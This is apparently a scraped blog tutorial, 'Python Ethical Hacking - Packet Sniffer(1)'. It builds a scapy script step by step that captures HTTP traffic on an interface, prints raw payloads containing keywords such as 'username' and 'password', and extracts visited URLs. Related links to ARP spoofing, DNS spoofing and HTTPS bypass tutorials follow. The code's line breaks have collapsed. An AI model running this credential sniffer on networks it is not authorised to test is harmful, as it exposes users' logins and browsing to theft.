Python Ethical Hacking - Packet Sniffer(1)
PACKET_SNIFFER
- Capture data flowing through an interface.
- Filter this data.
- Display Interesting information such as:
- Login info(username&password).
- Visited websites.
- Images.
- ...etc
PACKET_SNIFFER
CAPTURE & FILTER DATA
- scapy has a sniffer function.
- Can capture data sent to/from iface.
- Can call a function specified in prn on each packet.
Install the third party package.
pip install scapy_http
1. Write the Python to sniff all the Raw packets.
#!/usr/bin/env python from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
if packet.haslayer(scapy.all.Raw):
print(packet.show()) sniff("eth0")
Execute the script and sniff the packets on eth0.

2. Filter the useful packets
#!/usr/bin/env python from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
if packet.haslayer(scapy.all.Raw):
print(packet[scapy.all.Raw].load) sniff("eth0")
Execute the script and sniff the packets on eth0.

Rewrite the Python Script to filter the keywords.
#!/usr/bin/env python from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
if packet.haslayer(scapy.all.Raw):
load = packet[scapy.all.Raw].load.decode(errors='ignore')
keywords = ["username", "user", "login", "password", "pass"]
for keyword in keywords:
if keyword in load:
print(load)
break sniff("eth0")
Add the feature - Extracting URL
#!/usr/bin/env python from scapy.all import *
from scapy.layers.http import * def sniff(interface):
scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
url = packet[HTTPRequest].Host + packet[HTTPRequest].Path
print(url) if packet.haslayer(scapy.all.Raw):
load = packet[scapy.all.Raw].load.decode(errors='ignore')
keywords = ["username", "user", "login", "password", "pass"]
for keyword in keywords:
if keyword in load:
print(load)
break sniff("eth0")

Python Ethical Hacking - Packet Sniffer(1)的更多相关文章
- Python Ethical Hacking - Packet Sniffer(2)
Capturing passwords from any computer connected to the same network. ARP_SPOOF + PACKET_SNIFFER Ta ...
- Python Ethical Hacking - ARP Spoofing
Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...
- Python Ethical Hacking - NETWORK_SCANNER(1)
NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...
- Python Ethical Hacking - Bypass HTTPS(1)
HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...
- Python Ethical Hacking - BeEF Framework(1)
Browser Exploitation Framework. Allows us to launch a number of attacks on a hooked target. Targets ...
- Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(3)
Recalculating Content-Length: #!/usr/bin/env python import re from netfilterqueue import NetfilterQu ...
- Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)
MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...
- Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)
MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...
- Python Ethical Hacking - DNS Spoofing
What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...
随机推荐
- cocos2dx 启用cjson
在appDelegate.cpp文件中添加 #if __cplusplus extern "C" { // 加入此代码的目的,防止污染引擎的scripting目录 #include ...
- 一位老程序员说,有这份python3的开发指南,月薪能突破20K
推荐视频: AI人工智能识别技术_第一节AI人工智能识别技术_第二节Python基础案例之教你如何查询对方IP_第一节Python基础案例之教你如何查询对方IP_第二节 有程序员说,这份python3 ...
- Elasticsearch、Solr、Lucene、Hermes区别
Elasticsearch简介 Elasticsearch是一个实时分布式搜索和分析引擎.它让你以前所未有的速度处理大数据成为可能.它用于全文搜索.结构化搜索.分析以及将这三者混合使用:维基百科使用E ...
- Spring学习笔记下载
动力节点的spring视频教程相当的经典:下载地址 https://pan.baidu.com/s/1eTSOaae
- 计算机网络之DNS常见攻击
DNS欺骗 在Internet上存在的DNS服务器有绝大多数都是用bind来架设的,使用的bind版本主要为bind 4.9.5+P1以前版本和bind 8.2.2-P5以前版本.这些bind有个共同 ...
- python黑帽子之udp客户端
将上文的TCP客户端简单修改便能得到UDP客户端 import socket target_host = "127.0.0.1" target_port = 80 client = ...
- 函数进化到Lambda表达式的三过程
假如我们想要从一个整型数组中取出其中是奇数的选项,其实现方式有很多, 接下来通过三种方法的对比理解Lambda表达式的用途,需要了解的朋友可以参考下 //声明委托类型 public d ...
- IdentityServer4 4.x版本 配置Scope的正确姿势
前言 IdentityServer4 是为ASP.NET Core系列量身打造的一款基于 OpenID Connect 和 OAuth 2.0 认证的框架 IdentityServer4官方文档:ht ...
- java语言进阶(七)_Lambda表达式
1 函数式编程思想概述 在数学中,函数就是有输入量.输出量的一套计算方案,也就是"拿什么东西做什么事情".相对而言,面向对象过分强调"必须通过对象的形式来做事情" ...
- JS断点调试,必备的javaScript的debug调试技巧
1.断点调试是啥?难不难? 断点调试其实并不是多么复杂的一件事,简单的理解无外呼就是打开浏览器,打开sources找到js文件,在行号上点一下罢了.操作起来似乎很简单,其实很多人纠结的是,是在哪里打断 ...